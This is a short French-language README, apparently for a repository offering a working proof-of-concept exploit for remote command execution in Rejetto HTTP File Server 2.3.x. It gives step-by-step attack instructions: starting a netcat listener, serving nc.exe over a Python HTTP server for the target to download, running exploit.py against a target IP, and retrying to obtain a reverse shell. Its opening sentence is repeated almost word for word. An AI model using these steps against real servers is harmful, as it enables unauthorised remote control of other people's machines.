
Ce dépôt contient une explication détaillée et un PoC fonctionnel pour Rejetto HTTP File Server (HFS) 2.3.x - Exécution de commandes à distance.
Ce dépôt contient une explication détaillée et un PoC fonctionnel pour l'exécution de commandes à distance sur Rejetto HTTP File Server (HFS) 2.3.x.
Créez un écouteur netcat.
nc -lnvp 1234
Changez l'adresse IP de l'attaquant par votre IP et votre port.

Créez aussi un serveur de fichiers HTTP dans le même répertoire où se trouve nc.exe.
python -m http.server 80
python exploit.py <target-ip> <target-port>

Remarque : Vous devrez peut-être exécuter la charge utile plusieurs fois pour obtenir un shell inversé.